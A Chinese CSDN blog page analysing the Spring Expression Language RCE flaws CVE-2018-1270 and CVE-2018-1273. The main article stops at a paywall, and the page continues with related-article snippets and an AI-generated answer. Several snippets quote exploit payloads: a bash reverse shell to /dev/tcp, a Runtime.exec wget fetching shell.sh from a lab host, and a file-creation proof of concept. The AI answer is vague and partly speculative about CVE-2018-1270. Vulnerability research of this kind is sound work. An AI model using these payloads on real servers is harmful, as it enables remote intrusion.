CVE-2018-1270,CVE-2018-1273:Spring Expression Language 漏洞分析

最新推荐文章于 2025-05-18 20:09:18 发布
最新推荐文章于 2025-05-18 20:09:18 发布
阅读量1.5k 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞、安全 文章标签: spring 框架
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_22655689/article/details/84918904
本文深入分析了Spring框架中的两个重大漏洞CVE-2018-1270和CVE-2018-1273,它们源于Spring Expression Language(SpEL)的滥用。攻击者可通过构造恶意请求参数触发远程代码执行。文章详细探讨了SpEL的类类型表达式、类实例化以及如何利用这些功能发起攻击,并给出了实战案例和修复建议,包括使用华为云WAF防护、漏洞扫描服务和升级Spring框架版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00 背景

 

 

最近Spring框架不大太平,接连爆出来多个RCE远程代码执行的CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。

 

0x01 漏洞影响

攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。

受影响的范围

· Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10)

· Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)
· Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
· Spring Data REST 3.0 - 3.0.5 (Kay SR5)
· 更早的版本也会受到影响

 

0x02 SpEL

 

 

SpEL是一门非常简单的表达式语言,但是功能或者权限来说太大了,因此这里如果表达式能够被外部污染,基本上都可以造成RCE。

SpEL的具体语法,我这里就不一一介绍了,详情参考官方文档。我这里只说两个能够被有效利用的点。

最低0.47元/天 解锁文章

200万优质内容无限畅学
[Java安全]Spring Data Commons之CVE-2018-1273
snowlyzz的博客
02-08 815
CVE-2018-1273漏洞分析
linux漏洞分析,Spring-data-commons(CVE-2018-1273)漏洞分析
weixin_39830303的博客
05-13 936
前言CVE-2018-1273Spring-data-commons近期爆出的一个可远程执行代码的漏洞,为了了解更多细节,本文将从漏洞的成因,漏洞的判定以及漏洞的利用三个方面来进行详细说明。漏洞的成因当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容,而这一步就是本次漏洞的爆发点。漏洞的判定...
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 497
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
CVE-2018-1273源码分析漏洞复现
最新发布
spinage的博客
05-18 1252
CVE-2018-1273Spring Data Commons 中的一个高危远程代码执行(RCE)漏洞,影响版本为 1.13–1.13.10 和 2.0–2.0.5。攻击者通过构造包含恶意 SpEL 表达式的 HTTP 请求参数,触发表达式注入,从而在目标服务器上执行任意命令。漏洞的根源在于 Spring Data REST 对用户输入的参数名未进行安全过滤,直接作为 SpEL 表达式解析。官方修复方案包括将 StandardEvaluationContext 替换为 SimpleEvaluatio
春秋云镜 CVE-2018-1273
qq_22002773的博客
09-04 331
春秋云镜 CVE-2018-1273
spring(CVE-2018-1273)远程代码执行漏洞复现
热门推荐
勤劳的码农的博客
03-12 1万+
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
cve-2018-1273 Spring Expression Language 漏洞分析
whatday的专栏
07-31 1132
目录 0x00 背景 x01 漏洞影响 受影响的范围 0x02 SpEL 类类型表达式 类实例化 变量和函数的使用 0x03 SpEL调试 0x04 实战分析 CVE-2018-1273 攻击Exploit的诞生 0x00 背景 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行的CVE漏洞,其中有CVE-2018-1270CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。 x0
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1572
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
SpringCloud Function SpEL注入漏洞分析CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析CVE-2022-22963) SpringCloud Function 是 Spring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
CVE-2018-1273Spring Expression Language 漏洞分析
qq_22655689的博客
04-12 6608
0x00 背景 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行的CVE漏洞,其中有CVE-2018-1270CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。 x01 漏洞影响 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。...
CVE-2018-1273漏洞复现
qq_56426046的博客
09-11 1132
搭建好vulhub环境,选择 CVE-2018-1273漏洞通过"docker-compose build"和"docker-compose up -d"拉取环境,之后访问服务器ip:8080/users看环境是否成功。
[春秋云镜]CVE-2018-1273
niubi707的博客
12-02 5558
[春秋云镜]CVE-2018-1273Spring Data是一个用于简化数据库访问,并支持云服务的开源框架Spring Data Commons是Spring Data下所有子项目共享的基础框架Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
spring:CVE-2018:1273
weixin_69670995的博客
05-18 752
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
Spring Messaging 远程代码执行漏洞分析CVE-2018-1270
mole_exp的博客
02-26 8757
Spring Messaging 远程代码执行漏洞分析CVE-2018-1270
spring 代码执行 (CVE-2018-1273
YouthBelief的博客
11-11 2190
spring 代码执行 CVE-2018-1273spring 代码执行 (CVE-2018-1273)0x01 漏洞描述0x02 影响范围0x03 漏洞复现wget反弹shell0x04 漏洞修复 spring 代码执行 (CVE-2018-1273) 0x01 漏洞描述 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 0x02 影
Spring Data Commons 远程命令执行漏洞CVE-2018-1273
EC_Carrot的博客
08-04 383
漏洞简介 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架Spring Data Commons是Spring Data下所有子项目共享的基础框架Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 漏洞复现 参考文章中的payload,在注册的时候抓包,并修改成如下数据包,即可运行命令: POST /users?page=&size=5 HTTP/1.1 Host: localh
Spring RCE漏洞分析2(CVE-2018-1273
hldfight
05-07 2266
0x00 前言 继续分析Spring的历史漏洞,本篇记录Spring Data Commons的远程代码执行漏洞CVE-2018-1273)的分析。 0x01 环境搭建 使用的Spring Data Example Projects提供的示例代码。 但该项目中包含有15个子模块,如果将其整体导入IDEA,则需要下载所有模块中的依赖,显然这是没有必要的。通过参考这篇文章,发现只需导入web模块中的...
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273
wutiangui的博客
09-10 1127
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
web实验cve-2018-1270漏洞复现
12-28
关于CVE-2018-1270的信息似乎并未直接提供于所给的参考资料中,而提到的是其他类似的Spring Data REST漏洞CVE-2017-8046和CVE-2018-1273。然而,在讨论这些相似类型的漏洞时,可以推测CVE-2018-1270可能也涉及到了SpEL(Spring Expression Language)表达式的不安全处理,这通常意味着应用程序未能正确验证或转义用户输入的数据就将其作为表达式的一部分来解析。 对于CVE-2017-8046而言,该漏洞存在于Spring Data REST 2.6到2.6.10版本以及特定版本的Spring Data Commons中[^1]。当通过PATCH请求更新资源属性时,如果路径参数未经过适当的安全检查就被传递给了`setValue()`函数,则可能导致恶意构造的JSON Patch文档中的数据被执行为SpEL表达式,从而允许远程代码执行。 至于CVE-2018-1273,受影响的是Spring Data Commons及其关联组件的不同版本范围内。此漏洞同样源于对用户提交的内容缺乏足够的防护措施,使得攻击者能够利用精心设计的HTTP POST请求向服务器发送含有恶意SpEL表达式的payload,进而控制应用逻辑甚至操作系统层面的操作[^5]。 尽管这里没有具体描述CVE-2018-1270的技术细节,但从上述两个案例可以看出,这类RCE(Remote Code Execution, 远程代码执行)漏洞往往依赖于以下几个方面: - **易受攻击的应用程序接口**:通常是那些接受来自客户端未经充分校验的数据并试图动态评估它们的地方。 - **存在缺陷的功能模块**:比如在此处提及的支持RFC6902标准的JSON-Patch操作或是某些形式的对象映射机制。 要复现这样的漏洞,一般建议遵循如下指导原则而不是具体的步骤说明: ### 准备工作 #### 构建实验环境 建立一个隔离且可控的实验室环境非常重要,这样可以在不影响生产系统的前提下探索潜在风险。可以选择Docker容器化部署方式快速搭建目标软件栈,并确保安装了已知存在问题的具体版本号的服务端件。 ```bash docker pull vulhub/spring:cve-2017-8046 # 或者针对不同漏洞选择合适的镜像标签 docker run -d --name spring-vuln-app -p 8080:8080 vulhub/spring:cve-2017-8046 ``` > 注意:以上命令仅作为一个例子展示如何启动带有指定漏洞的应用实例;实际操作前应查阅官方资料确认适用于CVE-2018-1270的最佳实践方案。 #### 获取必要的工具集 准备好用于发起网络请求的工具,例如curl、Postman或其他任何支持自定义HTTP头字段设置的API调试器。另外还需要具备一定的编程能力以便编写脚本来自动化测试过程。 ### 测试流程 #### 发送特制请求 基于之前了解到的知识点,尝试构造能触发内部错误响应或者异常行为的有效载荷。由于本问题是围绕着SpEL表达式的滥用展开的,因此应该特别关注能否让服务端解释特殊字符序列(如`${}`包围起来的部分)为合法语句。 ```json { "field": "${T(java.lang.Runtime).getRuntime().exec('touch /tmp/exploit_worked')}" } ``` 这段JSON片段展示了怎样嵌入一段简单的Java反射调用来创建文件标记以证明概念可行性。当然,真实场景下的有效负载可能会更加复杂多变,取决于待测平台特性及权限级别等因素的影响。 #### 验证结果反馈 最后一步就是观察系统反应情况,看是否成功实现了预期之外的动作。可以通过查看日志记录、监控进程状态变化亦或是直接检验物理存储介质上的新实体等方式来进行判断。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值